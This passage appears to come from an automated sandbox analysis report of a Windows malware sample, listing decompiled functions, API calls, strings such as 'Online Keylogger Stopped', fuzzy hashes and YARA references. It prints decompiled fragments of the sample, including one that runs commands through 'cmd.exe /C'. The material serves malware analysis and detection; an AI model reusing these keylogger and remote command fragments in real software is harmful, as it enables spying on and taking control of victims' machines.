Part of subcall function 0043E9A5: GetLastError.KERNEL32(00000000,?,004475CF,00000000,00000000,00000000,00000000,?,00447873,00000000,00000007,00000000,?,00447DBE,00000000,00000000), ref: 0043E9CD

GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00449E06

Part of subcall function 0043DAF9: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00440547,00000001,00000364,?,0043602C,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 0043DB3A

Strings

\^)|/, xrefs: 00449D6B

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorHeapLast_free$AllocateByteCharFreeMultiWide__alloca_probe_16__freea
String ID: \^)|/
API String ID: 2017883074-265608074
Opcode ID: a53ba8590b331d1ff6ed35ed2c23522ab9803cdc8dc14011d9ddfc0c904dc56b
Instruction ID: 5c3f2b9bdfd5d723b952d84a209f0246bda20c86d29b65be27134420ffea4dac
Opcode Fuzzy Hash: a53ba8590b331d1ff6ed35ed2c23522ab9803cdc8dc14011d9ddfc0c904dc56b
Instruction Fuzzy Hash: 2641B471900115AAEF219E66DC81F9B7BBDEF45350F2040DBF909E2281DA39CD50EB69

Uniqueness

Uniqueness Score: -1.00%

Function 00445724, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00445749

Strings

\^)|/, xrefs: 0044572F
, xrefs: 0044578E
V\D, xrefs: 0044573B

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Info
String ID: $V\D$\^)|/
API String ID: 1807457897-1306753337
Opcode ID: 430e56f20e4f54e24a7d0868bcc2d29d0ddcf9f845f0c3072b9c0871465a986c
Instruction ID: 435880727d59a7cb91a697ff62815b87e1123ca578c91e5c8c9f01bf3860992f
Opcode Fuzzy Hash: 430e56f20e4f54e24a7d0868bcc2d29d0ddcf9f845f0c3072b9c0871465a986c
Instruction Fuzzy Hash: 374157705046489FEF218E24CC80AFBBBB9EB05308F1404EEE48A87103E6389A56CF24

Uniqueness

Uniqueness Score: -1.00%

Function 00443781, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,?,00443AE0,?,00000000,FF8BC35D), ref: 00443834
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00443AE0,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,00436AA6,?), ref: 00443862
GetLastError.KERNEL32(?,00443AE0,?,00000000,FF8BC35D,00000000,00000000,FF8BC369,00000000,00436AA6,?,Offline Keylogger Started,?,FFEC8B55,?,75FF2075), ref: 00443893

Strings

\^)|/, xrefs: 00443790

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: \^)|/
API String ID: 2456169464-265608074
Opcode ID: 19d56ed9b67c690a0d69c26e16fdb7b5ce0b232d1db39c0668a7ec45e5dec86f
Instruction ID: 428b470b2267358601b1250e01184528f584a5def160af6dc118f1431a1fbb19
Opcode Fuzzy Hash: 19d56ed9b67c690a0d69c26e16fdb7b5ce0b232d1db39c0668a7ec45e5dec86f
Instruction Fuzzy Hash: 28317E75A00219AFDB14DF59DD81AEAB7B8EF08705F0044BEF90AD7250E770AE80CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00449C65, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00449CCE
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 00449D2B
__freea.LIBCMT ref: 00449D34

Strings

\^)|/, xrefs: 00449C6D

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__alloca_probe_16__freea
String ID: \^)|/
API String ID: 3062693170-265608074
Opcode ID: b9a4d8791cda155a358071ec788997e84330c4292f6c8c357b5cd943c5689b8b
Instruction ID: 23dc68d11f74fc493e564840790fe812f9ee5f986f0140e586b003d16c3d36df
Opcode Fuzzy Hash: b9a4d8791cda155a358071ec788997e84330c4292f6c8c357b5cd943c5689b8b
Instruction Fuzzy Hash: BB31EF72E00116ABEB208F65CC85DAFBBA4EF85714F54466AFC14DB280DB38DD41C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00417893, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00417988

Part of subcall function 00410367: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410376
Part of subcall function 00410367: RegSetValueExA.KERNELBASE(?,0045F640,00000000,?,00000000,00000000,0046B4F8,?,?,0040D329,0045F640,3.1.0 Pro), ref: 0041039E
Part of subcall function 00410367: RegCloseKey.ADVAPI32(?,?,?,0040D329,0045F640,3.1.0 Pro), ref: 004103A9

Strings

Control Panel\Desktop, xrefs: 004178CE, 00417901, 00417951
TileWallpaper, xrefs: 00417972
WallpaperStyle, xrefs: 004178D3, 00417906, 00417956

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 0ef53351da3fd02dd68fbd5234df65d4541c50f1912a01cfed7bfff624d6a080
Instruction ID: fc31dd64c677c34b77f8f18e9bc13b3bb3294be0561434cea85da9f605def82e
Opcode Fuzzy Hash: 0ef53351da3fd02dd68fbd5234df65d4541c50f1912a01cfed7bfff624d6a080
Instruction Fuzzy Hash: 31117871B9420073D818313A0E17FAE28129796B11F51011BFA023B7D6E5CE5BD543DF

Uniqueness

Uniqueness Score: -1.00%

Function 0044176E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004417E1
_free.LIBCMT ref: 00441837

Part of subcall function 00441613: _free.LIBCMT ref: 0044166B
Part of subcall function 00441613: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004580DC), ref: 0044167D
Part of subcall function 00441613: WideCharToMultiByte.KERNEL32(00000000,00000000,0046A754,000000FF,00000000,0000003F,00000000,?,?), ref: 004416F5
Part of subcall function 00441613: WideCharToMultiByte.KERNEL32(00000000,00000000,0046A7A8,000000FF,?,0000003F,00000000,?), ref: 00441722

Strings

\^)|/, xrefs: 00441779

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: \^)|/
API String ID: 314583886-265608074
Opcode ID: 3a7f1eb2b62e023687577bdc2dd65208ae7e53e542acef2f15b9044efcdba1e6
Instruction ID: 8386f8bcd2e5b2f4a7e879c92d5e80980c5a9bc44e7fc21f99985aec99c609b4
Opcode Fuzzy Hash: 3a7f1eb2b62e023687577bdc2dd65208ae7e53e542acef2f15b9044efcdba1e6
Instruction Fuzzy Hash: FE213E7290021C67EB3067258C81AEF777CCF85774F21026BE894A22D1EF784DC586AD

Uniqueness

Uniqueness Score: -1.00%

Function 00408DFF, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,?,00000000), ref: 00408E0D
SetEvent.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00408EB3

Strings

[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 00408E16
], xrefs: 00408E1B

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EventLocalTime
String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
API String ID: 3120200302-1359877963
Opcode ID: b1dd4a53928ffeeb34935d7cf57da65295dfefa97ea72b1b70700e7717ee0378
Instruction ID: 78d11e21cef53e5cb272c91867ae4583e178e29f6d32a7f62056c05775a8de23
Opcode Fuzzy Hash: b1dd4a53928ffeeb34935d7cf57da65295dfefa97ea72b1b70700e7717ee0378
Instruction Fuzzy Hash: 6A21B3B28041086AD728AB66DC559FF77B8AF08715F00013FF942621D1EF786A85D6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0043B617, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

_abort.LIBCMT ref: 0043D7E8

Strings

@, xrefs: 0043D7D0
\^)|/, xrefs: 0043B61C
\^)|, xrefs: 0043B633, 0043B648

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _abort
String ID: \^)|$\^)|/$@
API String ID: 1888311480-1610244055
Opcode ID: 05256bdd8ebc1bd95fab09ece0df25471bf4004ddb3f12e6f09520e73d1bd1e5
Instruction ID: 7fa797529f0ecf1d0d008771fe5790a42e5f931c4d909bd58fd73664d6fa98d7
Opcode Fuzzy Hash: 05256bdd8ebc1bd95fab09ece0df25471bf4004ddb3f12e6f09520e73d1bd1e5
Instruction Fuzzy Hash: 8E110A3291431497DB14AF79EC06B597394AB48B24F20802BF9149B2C1DBB8AC408B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0044793E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044796D

Strings

`vE, xrefs: 00447951

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID: `vE
API String ID: 269201875-3359996253
Opcode ID: 0407e6a3e8946d498ccf26db74ae75a8223935101ed5a5ba34fd8e3a931923eb
Instruction ID: 7a91fc2d71282684d3a06e516d69e7716a286ce23c4c9779d2f2dc07dcfcd83b
Opcode Fuzzy Hash: 0407e6a3e8946d498ccf26db74ae75a8223935101ed5a5ba34fd8e3a931923eb
Instruction Fuzzy Hash: 2FF0A4B260D715AAF7142673A806F9B77599F82338F20002FF50866582DB6D184346EF

Uniqueness

Uniqueness Score: -1.00%

Function 00440E30, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,8CE85006,00000001,?,?), ref: 00440EA1

Strings

LCMapStringEx, xrefs: 00440E4B
@, xrefs: 00440E7D
\^)|/, xrefs: 00440E36

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: String
String ID: LCMapStringEx$\^)|/$@
API String ID: 2568140703-1766356399
Opcode ID: ac22328689dabe25d1e5c896fc5701685c2129c7c03d593932dda15e2f7f0902
Instruction ID: 6d64fd7ecfae92428e9b3a4b5f77621967d3717a58bbd058b945938ea242b887
Opcode Fuzzy Hash: ac22328689dabe25d1e5c896fc5701685c2129c7c03d593932dda15e2f7f0902
Instruction Fuzzy Hash: 8E011732500209FBCF129F91DD02EEE3F66EF08751F11415AFE0426161CA76D931EB99

Uniqueness

Uniqueness Score: -1.00%

Function 00440AE8, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,0043FD0B,?,00000000,00401C9D), ref: 00440B53

Strings

@, xrefs: 00440B2F
GetDateFormatEx, xrefs: 00440AF9, 00440B03
\^)|/, xrefs: 00440AEE

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DateFormat
String ID: GetDateFormatEx$\^)|/$@
API String ID: 2793631785-2666068447
Opcode ID: de7d3653f68eee32886d760efcc8da86bb79ff8ace7adc9a9e4765b711564d80
Instruction ID: 2bc29135107bd088e18f611ecb233b6eb2dd11ff30c761791540a01bf9d63023
Opcode Fuzzy Hash: de7d3653f68eee32886d760efcc8da86bb79ff8ace7adc9a9e4765b711564d80
Instruction Fuzzy Hash: 87017C3254020CFBCF129F90DC02E9F7F66EF09711F10401AFE0526161CABA9935EB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C097, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C105

Strings

ios_base::badbit set, xrefs: 0040C0C1
ios_base::failbit set, xrefs: 0040C0E7
ios_base::eofbit set, xrefs: 0040C0F4

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 2ec007ca2ce37d67eddf91e0e9c7cb741e0d8b254eca13023462f6143ef9e331
Instruction ID: a66805f9053e1028ec16422a320b0b9753b72b7a8e0a245382752591eb71c1ca
Opcode Fuzzy Hash: 2ec007ca2ce37d67eddf91e0e9c7cb741e0d8b254eca13023462f6143ef9e331
Instruction Fuzzy Hash: 8B014F71544308FAE714A7A5C893FBA77549B10705F60812BBE01B91C3DABD590ACAAE

Uniqueness

Uniqueness Score: -1.00%

Function 00408D1D, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

Part of subcall function 00408DFF: GetLocalTime.KERNEL32(?,?,00000000), ref: 00408E0D
Part of subcall function 00408DFF: SetEvent.KERNEL32(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00408EB3

Part of subcall function 00416673: GetLocalTime.KERNEL32(00000000), ref: 0041668D

CloseHandle.KERNEL32(00000000), ref: 00408D68
UnhookWindowsHookEx.USER32(0046B330), ref: 00408D7B

Strings

[Info], xrefs: 00408D4F
Online Keylogger Stopped, xrefs: 00408D2B, 00408D32, 00408D44

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocalTime$CloseEventHandleHookUnhookWindows
String ID: Online Keylogger Stopped$[Info]
API String ID: 1699053329-1913360614
Opcode ID: 3c50daee8056afecafe9828714f5afd6184c04c01a557bb99f3fcc36ca153b5e
Instruction ID: 4106082474d476f795bd0e019537a30137114a468b73b622cde553a11cca2d7c
Opcode Fuzzy Hash: 3c50daee8056afecafe9828714f5afd6184c04c01a557bb99f3fcc36ca153b5e
Instruction Fuzzy Hash: 9AF0FF21600250ABD625373ACA0A36E3EA28F52315F14017FF8C2225E3DF7E4895A39E

Uniqueness

Uniqueness Score: -1.00%

Function 004121BC, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004121BC(void* __edx, void* __ebp, void* __eflags, char _a16, char _a32, void* _a80, void* _a128, void* _a152) {
				void* _t10;

				_t40 = __eflags;
				_t10 = L00416DA4(L00401DAD( &_a16, __edx, __eflags, 0), _t40);
				_t34 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", L00401E4F(E004042DF(0,  &_a32, L"/C ", _t40, _t10)), 0, 0);
				L00401E54();
				L00401E54();
				L00401DD8( &_a16, _t34);
				L00401F11();
				L00401F11();
				return 0;
			}

0x004121bc
0x004121d0
0x004121d6
0x004121f8
0x00412202
0x00412cbd
0x00412e9d
0x00412ea9
0x00412eb5
0x00412ec2

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004121F8

Strings

open, xrefs: 004121F2
/C , xrefs: 004121D6
cmd.exe, xrefs: 004121ED

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: bf573a790cd85ad79e238c12d548e4a1dc5324aab7ee408ceeb9d5291fcc8eda
Instruction ID: b17b1f0ff783bbbc318199aac402af601c0b983347411c2d77b2c19216346ba1
Opcode Fuzzy Hash: bf573a790cd85ad79e238c12d548e4a1dc5324aab7ee408ceeb9d5291fcc8eda
Instruction Fuzzy Hash: 55F031712082005AD704FBB6DC919AFB398AFD0708F50483FF546A20E2EF7C9D4D865A

Uniqueness

Uniqueness Score: -1.00%

Function 0041020E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041020E(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* _t17;
				void* _t21;

				_v12 = 0x400;
				_t21 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x464a0c);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0040412C(_t17, _t21);
				return _t21;
			}

0x0041021c
0x0041022b
0x00410240
0x0041026b
0x00410242
0x00410253
0x0041025c
0x00410268
0x00410268
0x00410272
0x0041027e

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,0046B558,0046B4F8,?), ref: 00410238
RegQueryValueExW.ADVAPI32(0046B558,00000000,00000000,00000000,?,00000400), ref: 00410253
RegCloseKey.ADVAPI32(0046B558), ref: 0041025C

Strings

http\shell\open\command, xrefs: 0041022E

Memory Dump Source

Source File: 00000001.00000001.663167910.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.663464805.000000000046E000.00000040.00020000.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: 1fcdf405e29815b9caffde7bd2dc9c159894bd844f322025bdc621d26f20cf8d
Instruction ID: 11fe5f85e465c534ed3b8d5f19a83a54fffd88ec59cf8e357c96fafafc4a59e3
Opcode Fuzzy Hash: 1fcdf405e29815b9caffde7bd2dc9c159894bd844f322025bdc621d26f20cf8d
Instruction Fuzzy Hash: E0F0F631600108FBDB109B95EC09FDFBBBCEBC5B05F1000A7BA04E2050EAB45E95C7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00440C2A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39timeCOMMON

Download Yara Rule

APIs

GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,0043FD0B,?,00000000,00401C9D), ref: 00440C83

Strings

GetTimeFormatEx, xrefs: 00440C3B, 00440C45
@, xrefs: 00440C6E
\^)|/, xrefs: 00440C30

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: FormatTime
String ID: GetTimeFormatEx$\^)|/$@
API String ID: 3606616251-888281012
Opcode ID: 861a82772a918c323789feb43b3c5397f5cd98b7b990373ccccb011df05621e4
Instruction ID: 367338e66533e2ff6ac6b1ecf441b1b2a359ec79b40107f1223947af2f5aa545
Opcode Fuzzy Hash: 861a82772a918c323789feb43b3c5397f5cd98b7b990373ccccb011df05621e4
Instruction Fuzzy Hash: E6F0F432640208FBDF516F50CC02EAE7B25EF04B11F10012AFE0126262CE7A89349BC9

Uniqueness

Uniqueness Score: -1.00%

Function 00440C9A, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32(00000055,?,00000000,00447F68,?,00000055,00000050), ref: 00440CE4

Strings

@, xrefs: 00440CD2
\^)|/, xrefs: 00440CA0
GetUserDefaultLocaleName, xrefs: 00440CAB, 00440CB5

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DefaultUser
String ID: GetUserDefaultLocaleName$\^)|/$@
API String ID: 3358694519-2799761582
Opcode ID: 3afb01e851711784eaf9a345b951399a853bb9a14f6b49de52306272527845f7
Instruction ID: ee293f9884ec848a40d2231c3ca5f863fe77ee319e871e48023877cb88d8eb5c
Opcode Fuzzy Hash: 3afb01e851711784eaf9a345b951399a853bb9a14f6b49de52306272527845f7
Instruction Fuzzy Hash: 5CF0F631641218F7DB146B61CD06E9E7F64DB05B11F10402AFE0526192CEB559149699

Uniqueness

Uniqueness Score: -1.00%

Function 00440D63, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

IsValidLocale.KERNEL32(00000000,0043CD1C,00000000,00000001,?,?,0043CD1C,?,?,0043C6FC,?,00000004), ref: 00440DAF

Strings

@, xrefs: 00440D98
\^)|/, xrefs: 00440D69
IsValidLocaleName, xrefs: 00440D74, 00440D7E

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocaleValid
String ID: IsValidLocaleName$\^)|/$@
API String ID: 1901932003-3151225380
Opcode ID: af687646d45dbb6988392fa7b51cd2a5dac94983798fd904d7431efff89e48fc
Instruction ID: 78168a6041a258fe317f3fda027192bb073698ebfba546fef10ab5651d3f526c
Opcode Fuzzy Hash: af687646d45dbb6988392fa7b51cd2a5dac94983798fd904d7431efff89e48fc
Instruction Fuzzy Hash: 06F05930B80318B7DB206B61CC03FAE7B64CB00B02F10012BFE0126282CDB85D18898D

Uniqueness

Uniqueness Score: -1.00%

Function 00440D01, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00443EB1,-00000020,00000FA0,00000000,?,?), ref: 00440D4C

Strings

@, xrefs: 00440D3C
\^)|/, xrefs: 00440D07
InitializeCriticalSectionEx, xrefs: 00440D1C

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx$\^)|/$@
API String ID: 2593887523-1183851512
Opcode ID: 5d50362d1b65e9f1f060d0cbd7c6d360e4f51c4f84d2e4b4444f41888afdb507
Instruction ID: 171e1534dad5a752a0a2e2396cd9158c00b93a103f09ef013046643e0b02a2c8
Opcode Fuzzy Hash: 5d50362d1b65e9f1f060d0cbd7c6d360e4f51c4f84d2e4b4444f41888afdb507
Instruction Fuzzy Hash: E1F02431A00218BBCF105F60CC02EAE7F61EB05711B40416AFD091A262CEB59E28DA99

Uniqueness

Uniqueness Score: -1.00%

Function 004409E3, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

TlsFree.KERNEL32(?), ref: 00440A22

Strings

@, xrefs: 00440A18
\^)|/, xrefs: 004409E9
FlsFree, xrefs: 004409FE

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Free
String ID: FlsFree$\^)|/$@
API String ID: 3978063606-1614977377
Opcode ID: 984243b0cd77177019ee3ca7d1effe73eb44a77c13b0aa679d00df174ef0d774
Instruction ID: d6be0ee209e5525431cacc1a27486e6fc37e465c5d5447f41dcb0ddd8e6fc2a7
Opcode Fuzzy Hash: 984243b0cd77177019ee3ca7d1effe73eb44a77c13b0aa679d00df174ef0d774
Instruction Fuzzy Hash: 41E0A032B45218BBDA10AB15AC02A6EBB54DB55B02B50007FFD0566282DEB95E1486DE

Uniqueness

Uniqueness Score: -1.00%

Function 0044098D, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 004409CC

Strings

@, xrefs: 004409C2
\^)|/, xrefs: 00440993
FlsAlloc, xrefs: 004409A8

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Alloc
String ID: FlsAlloc$\^)|/$@
API String ID: 2773662609-1979341823
Opcode ID: 690e1f4a290869ead193fa26bd74d42a82595f600929b12f801fc4a972fe5b16
Instruction ID: 367fdea2d092fe182e3582ef157a02b69abb7b531cc0269be38aad60b35899ae
Opcode Fuzzy Hash: 690e1f4a290869ead193fa26bd74d42a82595f600929b12f801fc4a972fe5b16
Instruction Fuzzy Hash: 1FE05531A88318A7EB00AB10AC02F6EBB58CB04712B5000BBFD0523243DDB85E1086DE

Uniqueness

Uniqueness Score: -1.00%

Function 00440BD4, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 30timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00434E24), ref: 00440C13

Strings

@, xrefs: 00440C09
GetSystemTimePreciseAsFileTime, xrefs: 00440BEF
\^)|/, xrefs: 00440BDA

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Time$FileSystem
String ID: GetSystemTimePreciseAsFileTime$\^)|/$@
API String ID: 2086374402-3265319157
Opcode ID: bb948c0942542301b6098d278d9df1f6535c7c2b0c034f27ede86cb61d711303
Instruction ID: 91348cb6e99a9eb63d1a0a5a793b75b0885751a349e7d41855e671acaf40a51b
Opcode Fuzzy Hash: bb948c0942542301b6098d278d9df1f6535c7c2b0c034f27ede86cb61d711303
Instruction Fuzzy Hash: CDE05531B00218F79B24AF109C02E3EBB54CB00B52B10017FFD056B282DEB54E148ADE

Uniqueness

Uniqueness Score: -1.00%

Function 0044F5FA, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044F729

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 150134ac83d64e58f991697b444883f72f0a8dccf613897a499dc70f4fc39158
Instruction ID: df675666c716986970170786fb9ce627051f6d353645f575383673bc5f143e0d
Opcode Fuzzy Hash: 150134ac83d64e58f991697b444883f72f0a8dccf613897a499dc70f4fc39158
Instruction Fuzzy Hash: B8416F31A001106BFB207BFA9C467AF7A65EF4A374F15013FF414D6291D6BC4C06466E

Uniqueness

Uniqueness Score: -1.00%

Function 0043AE51, Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa21a60c0b5f60947863f72d8bc6ed0bdf3c6cdef84281a5e964a40ba3f7a5dd
Instruction ID: a57185b859b1155bc47913049d7f1c8e3ea14364bd36a362240ba98672e28893
Opcode Fuzzy Hash: aa21a60c0b5f60947863f72d8bc6ed0bdf3c6cdef84281a5e964a40ba3f7a5dd
Instruction Fuzzy Hash: C1410871680704AFE7249F38CC42B9ABBA8EB8C714F10952FF051DB2C1D779A9158795

Uniqueness

